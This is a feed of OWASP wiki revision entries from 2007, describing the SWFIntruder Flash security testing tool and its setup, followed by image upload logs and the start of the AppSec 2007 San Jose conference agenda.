[[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]&lt;br /&gt;
SWFIntruder (pronounced Swiff Intruder) is the first tool specifically &lt;br /&gt;
developed for analyzing and testing security of Flash applications at runtime.&lt;br /&gt;
It helps to find flaws in Flash applications using the methodology originally &lt;br /&gt;
described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in &lt;br /&gt;
[http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed using ActionScript, Html and JavaScript resulting in&lt;br /&gt;
a tool taking advantage of the best features of those technologies in order to&lt;br /&gt;
get the best capabilities for analysis and interaction with the testing Flash movies.&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed by using only open source software.&lt;br /&gt;
Thanks to its generality, SWFIntruder is OS independant.&lt;br /&gt;
&lt;br /&gt;
== Goals ==&lt;br /&gt;
&lt;br /&gt;
SWFIntruder purpose is to analyze a Flash application for version =&amp;lt; 8 and to &lt;br /&gt;
help check in a semi automated fashion the presence of security issues like&lt;br /&gt;
Cross Site Scripting and Cross Site Flashing.&lt;br /&gt;
&lt;br /&gt;
Moreover does help raise awareness around the subject of flash &lt;br /&gt;
applications security and how that can be used to and assist in the &lt;br /&gt;
security of applications. &lt;br /&gt;
&lt;br /&gt;
== QuickStart ==&lt;br /&gt;
&lt;br /&gt;
Tested on win32 and a few linux flavors. &lt;br /&gt;
Current version is 0.9.&lt;br /&gt;
Get it from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
=== Latest Features ===&lt;br /&gt;
&lt;br /&gt;
Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.&lt;br /&gt;
&lt;br /&gt;
=== Video Tutorial ===&lt;br /&gt;
&lt;br /&gt;
Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.&lt;br /&gt;
&lt;br /&gt;
=== Download ===&lt;br /&gt;
&lt;br /&gt;
You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
   1. Firefox 2.x [Needed]&lt;br /&gt;
   2. FireBug Addon [Suggested]&lt;br /&gt;
   3. Flash Player Plugin Ver &amp;gt;= 9 [Needed]&lt;br /&gt;
   4. Any Web Server [Needed]&lt;br /&gt;
   5. Any OS [Needed :&amp;gt; ]&lt;br /&gt;
&lt;br /&gt;
== Quick and Dirty Tutorial ==&lt;br /&gt;
&lt;br /&gt;
* Download SWFIntruder latest version from Google Code.&lt;br /&gt;
* Uncompress it and save it somewhere in your webserver root directory.&lt;br /&gt;
* Browse to http://YourHost/swfintruderDir/.&lt;br /&gt;
* Use test.swf (a simple flawed swf movie) by filling the &amp;quot;Flash Movie Form&amp;quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).&lt;br /&gt;
* Fill the &amp;quot;Flash Movie&amp;quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &amp;quot;Load&amp;quot;.&lt;br /&gt;
* Wait 1 second for the test movie to be loaded.&lt;br /&gt;
* Enjoy browsing the objects.&lt;br /&gt;
* Test undefined variables by selecting some of them in the &amp;quot;Undefined Variables&amp;quot; and click 'start' on the Xss window.&lt;br /&gt;
* Wait for the test to be finished.&lt;br /&gt;
* If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Features and Screenshots ==&lt;br /&gt;
&lt;br /&gt;
* Basic predefined attack patterns.&lt;br /&gt;
* Highly customizable attacks.&lt;br /&gt;
* Highly customizable undefined variables.&lt;br /&gt;
* Semi automated Xss check.&lt;br /&gt;
* User configurable internal parameters.&lt;br /&gt;
* Log Window for debugging and tracking.&lt;br /&gt;
* History of latest 5 tested SWF files.&lt;br /&gt;
* ActionScript Objects runtime explorer in tree view.&lt;br /&gt;
* Persistent Configuration and Layout.&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''.  &lt;br /&gt;
&lt;br /&gt;
SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The SWF Intruder project is sponsored by &lt;br /&gt;
[http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]&lt;br /&gt;
[[Category:OWASP Download]]&lt;br /&gt;
[[Category:OWASP Tool]]&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23817</id>
		<title>Category:OWASP Flash Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23817"/>
				<updated>2007-12-03T00:50:55Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Project Contributors */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security&lt;br /&gt;
&lt;br /&gt;
'''SWFIntruder''' is a tool developed by Stefano Di Paola and maintened by  [http://www.owasp.org OWASP] designed to perform a security analysis of Flash applications. &lt;br /&gt;
&lt;br /&gt;
== SWF Intruder Overview ==&lt;br /&gt;
&lt;br /&gt;
[[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]&lt;br /&gt;
SWFIntruder (pronounced Swiff Intruder) is the first tool specifically &lt;br /&gt;
developed for analyzing and testing security of Flash applications at runtime.&lt;br /&gt;
It helps to find flaws in Flash applications using the methodology originally &lt;br /&gt;
described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in &lt;br /&gt;
[http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed using ActionScript, Html and JavaScript resulting in&lt;br /&gt;
a tool taking advantage of the best features of those technologies in order to&lt;br /&gt;
get the best capabilities for analysis and interaction with the testing Flash movies.&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed by using only opensource software.&lt;br /&gt;
Thanks to its genericity, SWFIntruder is OS indipendant.&lt;br /&gt;
&lt;br /&gt;
== Goals ==&lt;br /&gt;
&lt;br /&gt;
SWFIntruder purpose is to analyse a Flash application for version =&amp;lt; 8 and to &lt;br /&gt;
help check in a semi automated fashion the presence of security issues like&lt;br /&gt;
Cross Site Scripting and Coss Site Flashing.&lt;br /&gt;
&lt;br /&gt;
Moreover does help raise awareness around the subject of flash &lt;br /&gt;
applications security and how that can be used to and assist in the &lt;br /&gt;
security of applications. &lt;br /&gt;
&lt;br /&gt;
== QuickStart ==&lt;br /&gt;
&lt;br /&gt;
Tested on win32 and a few linux flavours. &lt;br /&gt;
Current version is 0.9.&lt;br /&gt;
Get it from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
=== Latest Features ===&lt;br /&gt;
&lt;br /&gt;
Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.&lt;br /&gt;
&lt;br /&gt;
=== Video Tutorial ===&lt;br /&gt;
&lt;br /&gt;
Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.&lt;br /&gt;
&lt;br /&gt;
=== Download ===&lt;br /&gt;
&lt;br /&gt;
You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
   1. Firefox 2.x [Needed]&lt;br /&gt;
   2. FireBug Addon [Suggested]&lt;br /&gt;
   3. Flash Player Plugin Ver &amp;gt;= 9 [Needed]&lt;br /&gt;
   4. Any Web Server [Needed]&lt;br /&gt;
   5. Any OS [Needed :&amp;gt; ]&lt;br /&gt;
&lt;br /&gt;
== Quick and Dirty Tutorial ==&lt;br /&gt;
&lt;br /&gt;
* Download SWFIntruder latest version from Google Code.&lt;br /&gt;
* Uncompress it and save it somewhere in your websever root directory.&lt;br /&gt;
* Browse to http://YourHost/swfintruderDir/.&lt;br /&gt;
* Use test.swf (a simple flawed swf movie) by filling the &amp;quot;Flash Movie Form&amp;quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).&lt;br /&gt;
* Fill the &amp;quot;Flash Movie&amp;quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &amp;quot;Load&amp;quot;.&lt;br /&gt;
* Wait 1 second for the test movie to be loaded.&lt;br /&gt;
* Enjoy browsing the objects.&lt;br /&gt;
* Test undefined variables by selecting some of them in the &amp;quot;Undefined Variables&amp;quot; and click 'start' on the Xss window.&lt;br /&gt;
* Wait for the test to be finished.&lt;br /&gt;
* If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Features and Screenshots ==&lt;br /&gt;
&lt;br /&gt;
* Basic predefined attack patterns.&lt;br /&gt;
* Highly customizable attacks.&lt;br /&gt;
* Highly customizable undefined variables.&lt;br /&gt;
* Semi automated Xss check.&lt;br /&gt;
* User congurable internal parameters.&lt;br /&gt;
* Log Window for debugging and tracking.&lt;br /&gt;
* History of latest 5 tested SWF files.&lt;br /&gt;
* ActionScript Objects runtime explorer in tree view.&lt;br /&gt;
* Persistent Configuration and Layout.&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''.  &lt;br /&gt;
&lt;br /&gt;
SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The SWF Intruder project is sponsored by &lt;br /&gt;
[http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]&lt;br /&gt;
[[Category:OWASP Download]]&lt;br /&gt;
[[Category:OWASP Tool]]&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23816</id>
		<title>Category:OWASP Flash Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23816"/>
				<updated>2007-12-03T00:47:18Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security&lt;br /&gt;
&lt;br /&gt;
'''SWFIntruder''' is a tool developed by Stefano Di Paola and maintened by  [http://www.owasp.org OWASP] designed to perform a security analysis of Flash applications. &lt;br /&gt;
&lt;br /&gt;
== SWF Intruder Overview ==&lt;br /&gt;
&lt;br /&gt;
[[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]&lt;br /&gt;
SWFIntruder (pronounced Swiff Intruder) is the first tool specifically &lt;br /&gt;
developed for analyzing and testing security of Flash applications at runtime.&lt;br /&gt;
It helps to find flaws in Flash applications using the methodology originally &lt;br /&gt;
described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in &lt;br /&gt;
[http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed using ActionScript, Html and JavaScript resulting in&lt;br /&gt;
a tool taking advantage of the best features of those technologies in order to&lt;br /&gt;
get the best capabilities for analysis and interaction with the testing Flash movies.&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed by using only opensource software.&lt;br /&gt;
Thanks to its genericity, SWFIntruder is OS indipendant.&lt;br /&gt;
&lt;br /&gt;
== Goals ==&lt;br /&gt;
&lt;br /&gt;
SWFIntruder purpose is to analyse a Flash application for version =&amp;lt; 8 and to &lt;br /&gt;
help check in a semi automated fashion the presence of security issues like&lt;br /&gt;
Cross Site Scripting and Coss Site Flashing.&lt;br /&gt;
&lt;br /&gt;
Moreover does help raise awareness around the subject of flash &lt;br /&gt;
applications security and how that can be used to and assist in the &lt;br /&gt;
security of applications. &lt;br /&gt;
&lt;br /&gt;
== QuickStart ==&lt;br /&gt;
&lt;br /&gt;
Tested on win32 and a few linux flavours. &lt;br /&gt;
Current version is 0.9.&lt;br /&gt;
Get it from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
=== Latest Features ===&lt;br /&gt;
&lt;br /&gt;
Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.&lt;br /&gt;
&lt;br /&gt;
=== Video Tutorial ===&lt;br /&gt;
&lt;br /&gt;
Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.&lt;br /&gt;
&lt;br /&gt;
=== Download ===&lt;br /&gt;
&lt;br /&gt;
You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
   1. Firefox 2.x [Needed]&lt;br /&gt;
   2. FireBug Addon [Suggested]&lt;br /&gt;
   3. Flash Player Plugin Ver &amp;gt;= 9 [Needed]&lt;br /&gt;
   4. Any Web Server [Needed]&lt;br /&gt;
   5. Any OS [Needed :&amp;gt; ]&lt;br /&gt;
&lt;br /&gt;
== Quick and Dirty Tutorial ==&lt;br /&gt;
&lt;br /&gt;
* Download SWFIntruder latest version from Google Code.&lt;br /&gt;
* Uncompress it and save it somewhere in your websever root directory.&lt;br /&gt;
* Browse to http://YourHost/swfintruderDir/.&lt;br /&gt;
* Use test.swf (a simple flawed swf movie) by filling the &amp;quot;Flash Movie Form&amp;quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).&lt;br /&gt;
* Fill the &amp;quot;Flash Movie&amp;quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &amp;quot;Load&amp;quot;.&lt;br /&gt;
* Wait 1 second for the test movie to be loaded.&lt;br /&gt;
* Enjoy browsing the objects.&lt;br /&gt;
* Test undefined variables by selecting some of them in the &amp;quot;Undefined Variables&amp;quot; and click 'start' on the Xss window.&lt;br /&gt;
* Wait for the test to be finished.&lt;br /&gt;
* If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Features and Screenshots ==&lt;br /&gt;
&lt;br /&gt;
* Basic predefined attack patterns.&lt;br /&gt;
* Highly customizable attacks.&lt;br /&gt;
* Highly customizable undefined variables.&lt;br /&gt;
* Semi automated Xss check.&lt;br /&gt;
* User congurable internal parameters.&lt;br /&gt;
* Log Window for debugging and tracking.&lt;br /&gt;
* History of latest 5 tested SWF files.&lt;br /&gt;
* ActionScript Objects runtime explorer in tree view.&lt;br /&gt;
* Persistent Configuration and Layout.&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is run by Stefano Di Paola. He can be contacted at '''wisec AT owasp.org'''.  &lt;br /&gt;
&lt;br /&gt;
SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]]. &lt;br /&gt;
&lt;br /&gt;
If you are interested in volunteering for the project, or have a comment, question, or suggestion, please join the Flash Security&lt;br /&gt;
&lt;br /&gt;
[http://lists.owasp.org/mailman/listinfo/owasp-flash-security mailing list].&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The SWF Intruder project is sponsored by &lt;br /&gt;
[http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]&lt;br /&gt;
[[Category:OWASP Download]]&lt;br /&gt;
[[Category:OWASP Tool]]&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23804</id>
		<title>File:SWFIntruderSnapThumb.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23804"/>
				<updated>2007-12-02T22:58:10Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: uploaded a new version of &amp;quot;Image:SWFIntruderSnapThumb.jpg&amp;quot;: Reverted to version as of 17:44, 2 December 2007&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Thumbnail Screenshot of SWFIntruder main window&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23803</id>
		<title>File:SWFIntruderSnapThumb.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23803"/>
				<updated>2007-12-02T22:57:40Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: uploaded a new version of &amp;quot;Image:SWFIntruderSnapThumb.jpg&amp;quot;: SWFIntruder Screenshot&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Thumbnail Screenshot of SWFIntruder main window&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23802</id>
		<title>File:SWFIntruderSnapThumb.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23802"/>
				<updated>2007-12-02T17:44:05Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: uploaded a new version of &amp;quot;Image:SWFIntruderSnapThumb.jpg&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Thumbnail Screenshot of SWFIntruder main window&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23801</id>
		<title>File:SWFIntruderSnapThumb.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23801"/>
				<updated>2007-12-02T17:41:55Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: uploaded a new version of &amp;quot;Image:SWFIntruderSnapThumb.jpg&amp;quot;: Reverted to version as of 17:25, 2 December 2007&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Thumbnail Screenshot of SWFIntruder main window&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23800</id>
		<title>File:SWFIntruderSnapThumb.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23800"/>
				<updated>2007-12-02T17:41:44Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: uploaded a new version of &amp;quot;Image:SWFIntruderSnapThumb.jpg&amp;quot;: Reverted to version as of 17:25, 2 December 2007&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Thumbnail Screenshot of SWFIntruder main window&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23799</id>
		<title>File:SWFIntruderSnapThumb.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23799"/>
				<updated>2007-12-02T17:33:07Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: uploaded a new version of &amp;quot;Image:SWFIntruderSnapThumb.jpg&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Thumbnail Screenshot of SWFIntruder main window&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23797</id>
		<title>File:SWFIntruderSnapThumb.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&amp;diff=23797"/>
				<updated>2007-12-02T17:25:57Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: Thumbnail Screenshot of SWFIntruder main window&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Thumbnail Screenshot of SWFIntruder main window&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda&amp;diff=23640</id>
		<title>7th OWASP AppSec Conference - San Jose 2007/Agenda</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda&amp;diff=23640"/>
				<updated>2007-11-24T16:42:10Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* OWASP &amp;amp; WASC AppSec 2007 Conference Schedule - Nov 14-15 (San Jose 2007) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The agenda for the conference is still under development and is subject to change.&lt;br /&gt;
&lt;br /&gt;
The [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda#Nov 14: Track 3: Web Services Security | Web Services Security Track]], which is the 3rd track on Day 1, is at the bottom of this page.&lt;br /&gt;
&lt;br /&gt;
== OWASP &amp;amp; WASC AppSec 2007 Training Courses - Nov 12th-13th 2007 ==&lt;br /&gt;
&lt;br /&gt;
The tutorials and the conference itself was held at eBay in San Jose.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | T1. Building and Testing Secure Web Applications&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;background:#F2F2F2&amp;quot; | This powerful two-day course focuses on the most common web application security problems, including the OWASP Top Ten. The course will introduce and demonstrate hacking techniques, illustrating how easily application vulnerabilities can be exploited so students really understand how to avoid introducing such vulnerabilities into their code. [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T1._Building_and_Testing_Secure_Web_Applications_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]&lt;br /&gt;
 |-&lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | T2. Secure Coding for Java EE&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;background:#F2F2F2&amp;quot; | This Java focused course covers the most common Java EE web application security problems, including the OWASP Top Ten. It teaches Java EE best practices, so developers can really understand how to avoid introducing such vulnerabilities into their Java EE applications. '''This course includes hands on coding exercises that allows the students to fix real flaws in a Java EE application using the best practices recommended in class!!''' [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T2._Secure_Coding_for_Java_EE_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]&lt;br /&gt;
 |-&lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | T3. Secure Coding .NET Web Applications&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;background:#F2F2F2&amp;quot; | This .NET focused course covers the most common .NET web application security problems, including the OWASP Top Ten. It teaches .NET best practices, so developers can really understand how to avoid introducing such vulnerabilities into their .NET web applications. '''This course includes hands on coding exercises that allows the students to fix real flaws in a .NET application using the best practices recommended in class!!''' [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T3._Secure_Coding_.NET_Web_Applications_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]&lt;br /&gt;
 |-&lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | T4. Web Services and XML Security&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;background:#F2F2F2&amp;quot; | Many enterprises are currently developing new Web Services and/or adding and acquiring Web Services functionality into existing applications -- now is the time to build security into the system! [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T4._Web_Services_and_XML_Security_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]&lt;br /&gt;
 |-&lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | T5. Leveraging OWASP Tools and Documents to Secure Your Enterprise&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;background:#F2F2F2&amp;quot; | Apart from OWASP's Top 10, most OWASP projects are not widely used and understood. In most cases this is not due to lack of quality and usefulness of these Document &amp;amp; Tool projects, but due to a lack of understanding of where they fit in an Enterprise's security ecosystem or in the Web Application Development Lifecycle (WADL). This course aims to change that by providing detailed presentations of the most mature and enterprise ready OWASP projects together with practical examples of how to use them. [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T5._Leveraging_OWASP_Tools_and_Documents_to_Secure_Your_Enterprise_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]&lt;br /&gt;
 |-&lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | T6. Open Source ModSecurity Training &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;background:#F2F2F2&amp;quot; | ModSecurity is currently the most widely deployed web application firewall (WAF) product. This two-day class is for those people who want to learn how to build, deploy, and use ModSecurity in the most effective manner. The course will cover the open source ModSecurity Console, which helps manage alerts on suspicious web activity targeting your web servers. The course also provides an in-depth look at the extremely powerful ModSecurity Rules Language. [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T6._Open_Source_ModSecurity_Training_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
November 12th - Cenzic is sponsoring a cocktail party at the eBay facility after the first day of training.&lt;br /&gt;
&lt;br /&gt;
== Tech Expo - Nov 13th-14th ==&lt;br /&gt;
&lt;br /&gt;
Product vendors demonstrated their application security products to conference attendees for the first time at this OWASP Conference. The focus of this expo was on the technical details of the technologies they are offering in the market to help organizations deal with their application security issues.&lt;br /&gt;
 &lt;br /&gt;
The technology expo was held:&lt;br /&gt;
* November 13th: From 12-2, with lunch included for all the OWASP tutorial attendees who will be invited to attend the expo.&lt;br /&gt;
* November 14th: From 11-6 during the first day of the OWASP conference. &lt;br /&gt;
&lt;br /&gt;
'''Breach Cocktail Party - Nov 13'''&lt;br /&gt;
&lt;br /&gt;
To close out the training event and the first day of the tech expo, Breach kindly agreed to arrange a cocktail party on Tuesday evening. They sponsored a similar event at Black Hat for a joint OWASP / WASC get together and it was a roaring success with over 300 attendees. These have always been great events at previous conferences. For more details and RSVP go to: http://www.breach.com/breach_security_party_owaspwasc_san_jose.html&lt;br /&gt;
&lt;br /&gt;
== OWASP &amp;amp; WASC AppSec 2007 Conference Schedule - Nov 14-15 (San Jose 2007) ==&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | Day 1 - Nov 14, 2007&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Track 1: &lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Track 2: &lt;br /&gt;
 |-&lt;br /&gt;
